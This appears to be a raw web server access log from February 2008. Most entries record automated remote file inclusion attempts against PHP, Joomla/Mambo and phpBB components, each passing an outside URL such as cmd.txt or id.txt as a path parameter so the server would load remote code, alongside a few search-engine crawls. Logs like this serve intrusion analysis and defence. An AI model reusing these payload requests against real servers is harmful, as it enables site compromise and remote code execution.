210.205.57.2 - - [14/Feb/2008:12:15:12 -0800] "GET /page.php5?id=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.205.57.2 - - [14/Feb/2008:12:15:12 -0800] "GET /logs/page.php5?id=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.252.91.7 - - [14/Feb/2008:12:15:45 -0800] "GET /logs/access_080101.log//?index.php?mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.252.91.7 - - [14/Feb/2008:12:15:46 -0800] "GET //?index.php?mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
218.252.91.7 - - [14/Feb/2008:12:15:51 -0800] "GET /logs//?index.php?mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 200 34548 "-" "libwww-perl/5.805" "www.dmulk.com"
207.7.108.240 - - [14/Feb/2008:12:15:56 -0800] "GET //components/com_forum/download.php?phpbb_root_path=http://j-vision.co.kr/company/mild/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.252.91.7 - - [14/Feb/2008:12:16:33 -0800] "GET /logs/access_071221.log//?index.php?mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.80.206.12 - - [14/Feb/2008:12:17:16 -0800] "GET /administrator/components/com_comprofiler/admin.comprofiler.controller.php?mosConfig_absolute_path=http://branigan.net/mmb/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
88.80.206.12 - - [14/Feb/2008:12:17:16 -0800] "GET /logs/administrator/components/com_comprofiler/admin.comprofiler.controller.php?mosConfig_absolute_path=http://branigan.net/mmb/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
202.60.70.58 - - [14/Feb/2008:12:17:19 -0800] "GET /logs/access_080126.log//?index.php?mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.193.222.218 - - [14/Feb/2008:12:17:56 -0800] "GET /logs/administrator/components/com_comprofiler/admin.comprofiler.controller.php?mosConfig_absolute_path=http://branigan.net/mmb/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
213.193.222.218 - - [14/Feb/2008:12:17:56 -0800] "GET /administrator/components/com_comprofiler/admin.comprofiler.controller.php?mosConfig_absolute_path=http://branigan.net/mmb/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
67.18.231.100 - - [14/Feb/2008:12:19:54 -0800] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.152.41.4 - - [14/Feb/2008:12:21:54 -0800] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.wvcorrectionalindustries.com/phpdig/admin/temp/cmd.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.213.57.49 - - [14/Feb/2008:12:22:12 -0800] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
194.213.194.42 - - [14/Feb/2008:12:22:28 -0800] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.213.194.42 - - [14/Feb/2008:12:22:28 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.213.194.42 - - [14/Feb/2008:12:22:29 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.164.34 - - [14/Feb/2008:12:25:23 -0800] "GET /logs/access.log//codebb/lang_select?phpbb_root_path=http://insonia.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.212.164.34 - - [14/Feb/2008:12:25:24 -0800] "GET //codebb/lang_select?phpbb_root_path=http://insonia.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.212.164.34 - - [14/Feb/2008:12:25:24 -0800] "GET /logs//codebb/lang_select?phpbb_root_path=http://insonia.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.66.124.141 - - [14/Feb/2008:12:29:38 -0800] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
209.216.205.192 - - [14/Feb/2008:12:29:41 -0800] "GET /logs/access.log/index1.php?choix=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.205.192 - - [14/Feb/2008:12:29:41 -0800] "GET /index1.php?choix=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.205.192 - - [14/Feb/2008:12:29:41 -0800] "GET /logs/index1.php?choix=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.205.192 - - [14/Feb/2008:12:29:49 -0800] "GET /logs/access_080122.log/index1.php?choix=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.146.33.210 - - [14/Feb/2008:12:31:57 -0800] "GET /index.php?option=com_juga&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
82.146.33.210 - - [14/Feb/2008:12:31:58 -0800] "GET /logs/index.php?option=com_juga&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
205.234.222.47 - - [14/Feb/2008:12:32:31 -0800] "GET /index.php?option=com_juga&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
205.234.222.47 - - [14/Feb/2008:12:32:31 -0800] "GET /logs/index.php?option=com_juga&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
210.205.57.2 - - [14/Feb/2008:12:33:03 -0800] "GET /logs/access_080122.log/index1.php?choix=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.205.57.2 - - [14/Feb/2008:12:33:03 -0800] "GET /index1.php?choix=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.205.57.2 - - [14/Feb/2008:12:33:03 -0800] "GET /logs/index1.php?choix=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.205.57.2 - - [14/Feb/2008:12:33:04 -0800] "GET /logs/access.log/index1.php?choix=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.192.212 - - [14/Feb/2008:12:33:57 -0800] "GET /logs/access_071214.log//skin/zero_vote/error.php?dir=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [14/Feb/2008:12:33:57 -0800] "GET //skin/zero_vote/error.php?dir=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [14/Feb/2008:12:33:58 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.38.34.152 - - [14/Feb/2008:12:34:15 -0800] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://kelserific3.iespana.es/id.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.34.152 - - [14/Feb/2008:12:34:15 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://kelserific3.iespana.es/id.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.34.152 - - [14/Feb/2008:12:34:15 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://kelserific3.iespana.es/id.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.38.62.39 - - [14/Feb/2008:12:34:26 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.laspeores.com.ar/lp//modules/Skins/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
80.38.62.39 - - [14/Feb/2008:12:34:27 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.laspeores.com.ar/lp//modules/Skins/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
80.38.62.39 - - [14/Feb/2008:12:34:28 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.laspeores.com.ar/lp//modules/Skins/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
80.38.62.39 - - [14/Feb/2008:12:34:33 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.laspeores.com.ar/lp//modules/Skins/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.6.24.146 - - [14/Feb/2008:12:36:54 -0800] "GET /retreat1/ HTTP/1.0" 200 15065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.23.108 - - [14/Feb/2008:12:39:28 -0800] "GET /plans/A3_ROOF_PLAN.pdf HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
190.54.62.66 - - [14/Feb/2008:12:40:16 -0800] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [14/Feb/2008:12:40:16 -0800] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [14/Feb/2008:12:40:16 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.213.57.49 - - [14/Feb/2008:12:44:05 -0800] "GET /logs/access_080122.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
204.213.57.49 - - [14/Feb/2008:12:44:05 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
204.213.57.49 - - [14/Feb/2008:12:44:05 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
80.199.102.117 - - [14/Feb/2008:12:45:23 -0800] "GET /logs/access.log//codebb/lang_select?phpbb_root_path=http://insonia.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [14/Feb/2008:12:45:24 -0800] "GET //codebb/lang_select?phpbb_root_path=http://insonia.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [14/Feb/2008:12:45:24 -0800] "GET /logs//codebb/lang_select?phpbb_root_path=http://insonia.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.7.108.240 - - [14/Feb/2008:12:45:52 -0800] "GET /logs/access_080121.log//components/com_forum/download.php?phpbb_root_path=http://j-vision.co.kr/company/mild/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.7.108.240 - - [14/Feb/2008:12:45:52 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://j-vision.co.kr/company/mild/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.116.0.130 - - [14/Feb/2008:12:47:30 -0800] "GET /logs/access_080126.log/modules/My_eGallery/index.php?basepath=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.116.0.130 - - [14/Feb/2008:12:47:30 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.116.0.130 - - [14/Feb/2008:12:47:30 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.135.176 - - [14/Feb/2008:12:49:32 -0800] "GET /http://bastard0.interfree.it/mia/bao/asd/lol/id.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
69.10.135.176 - - [14/Feb/2008:12:49:32 -0800] "GET /logs/http://bastard0.interfree.it/mia/bao/asd/lol/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
69.10.135.176 - - [14/Feb/2008:12:49:42 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bastard0.interfree.it/mia/bao/asd/lol/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
69.10.135.176 - - [14/Feb/2008:12:49:42 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bastard0.interfree.it/mia/bao/asd/lol/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
72.47.200.153 - - [14/Feb/2008:12:51:00 -0800] "GET //errors.php?error=http://www.trinker-ulm.de//phpmic.txt.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
72.47.200.153 - - [14/Feb/2008:12:51:01 -0800] "GET /logs//errors.php?error=http://www.trinker-ulm.de//phpmic.txt.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
208.116.0.130 - - [14/Feb/2008:12:52:44 -0800] "GET /logs/access_080121.log/modules/My_eGallery/index.php?basepath=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.97.199.252 - - [14/Feb/2008:12:53:30 -0800] "GET //avatar.php?page=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
209.97.199.252 - - [14/Feb/2008:12:53:30 -0800] "GET /logs//avatar.php?page=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
218.38.34.152 - - [14/Feb/2008:12:53:33 -0800] "GET /logs/access.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://kelserific3.iespana.es/id.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.65.101.173 - - [14/Feb/2008:12:54:15 -0800] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
69.65.101.173 - - [14/Feb/2008:12:54:15 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
193.202.89.57 - - [14/Feb/2008:12:55:33 -0800] "GET /logs/access_080106.log/index.php?skin_file=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.202.89.57 - - [14/Feb/2008:12:55:38 -0800] "GET /index.php?skin_file=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.202.89.57 - - [14/Feb/2008:12:55:43 -0800] "GET /logs/index.php?skin_file=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.38.62.39 - - [14/Feb/2008:12:56:21 -0800] "GET //skin/zero_vote/error.php?dir=http://www.laspeores.com.ar/lp//modules/Skins/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
80.38.62.39 - - [14/Feb/2008:12:56:21 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.laspeores.com.ar/lp//modules/Skins/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.6.17.141 - - [14/Feb/2008:12:58:33 -0800] "GET /presto/?D=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.17.141 - - [14/Feb/2008:12:59:00 -0800] "GET /minamijewelry/html/ HTTP/1.0" 200 13287 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
190.54.62.66 - - [14/Feb/2008:13:00:47 -0800] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.200.153 - - [14/Feb/2008:13:05:18 -0800] "GET /logs//errors.php?error=http://www.trinker-ulm.de//phpmic.txt.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
72.47.200.153 - - [14/Feb/2008:13:05:19 -0800] "GET //errors.php?error=http://www.trinker-ulm.de//phpmic.txt.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
74.6.25.23 - - [14/Feb/2008:13:05:20 -0800] "GET /mobileoffice/?M=A HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.160.188.77 - - [14/Feb/2008:13:05:31 -0800] "GET /logs/access.log/index1.php?choix=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.160.188.77 - - [14/Feb/2008:13:05:37 -0800] "GET /index1.php?choix=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.160.188.77 - - [14/Feb/2008:13:05:42 -0800] "GET /logs/index1.php?choix=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.10.135.176 - - [14/Feb/2008:13:05:49 -0800] "GET /logs//index.php?skin_file=http://bastard0.interfree.it/mia/bao/asd/lol/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
69.10.135.176 - - [14/Feb/2008:13:05:49 -0800] "GET //index.php?skin_file=http://bastard0.interfree.it/mia/bao/asd/lol/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
213.160.188.77 - - [14/Feb/2008:13:06:35 -0800] "GET /logs/access_080122.log/index1.php?choix=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.205.57.2 - - [14/Feb/2008:13:07:32 -0800] "GET /logs/access_071225.log/index.php?table=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.205.57.2 - - [14/Feb/2008:13:07:32 -0800] "GET /index.php?table=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.205.57.2 - - [14/Feb/2008:13:07:32 -0800] "GET /logs/index.php?table=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.176.90 - - [14/Feb/2008:13:08:08 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.sarion.info/blackguard/error?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.69.144.194 - - [14/Feb/2008:13:10:18 -0800] "GET /logs/access_071225.log//index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.69.144.194 - - [14/Feb/2008:13:10:19 -0800] "GET //index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.69.144.194 - - [14/Feb/2008:13:10:19 -0800] "GET /logs//index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.129.193.100 - - [14/Feb/2008:13:11:17 -0800] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
216.129.193.100 - - [14/Feb/2008:13:11:17 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
83.149.90.29 - - [14/Feb/2008:13:11:43 -0800] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.freewebtown.com/shadowss/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
83.149.90.29 - - [14/Feb/2008:13:11:44 -0800] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.freewebtown.com/shadowss/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
69.10.135.176 - - [14/Feb/2008:13:12:15 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://bastard0.interfree.it/mia/bao/asd/lol/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
69.10.135.176 - - [14/Feb/2008:13:12:15 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://bastard0.interfree.it/mia/bao/asd/lol/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
193.69.144.194 - - [14/Feb/2008:13:12:38 -0800] "GET /logs/access.log//index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.146.33.210 - - [14/Feb/2008:13:12:46 -0800] "GET /logs/index.php?option=com_pollxt&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
82.146.33.210 - - [14/Feb/2008:13:12:47 -0800] "GET /index.php?option=com_pollxt&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
69.10.135.176 - - [14/Feb/2008:13:13:03 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://bastard0.interfree.it/mia/bao/asd/lol/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
69.10.135.176 - - [14/Feb/2008:13:13:03 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://bastard0.interfree.it/mia/bao/asd/lol/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
205.234.222.47 - - [14/Feb/2008:13:13:09 -0800] "GET /logs/index.php?option=com_pollxt&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
205.234.222.47 - - [14/Feb/2008:13:13:11 -0800] "GET /index.php?option=com_pollxt&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
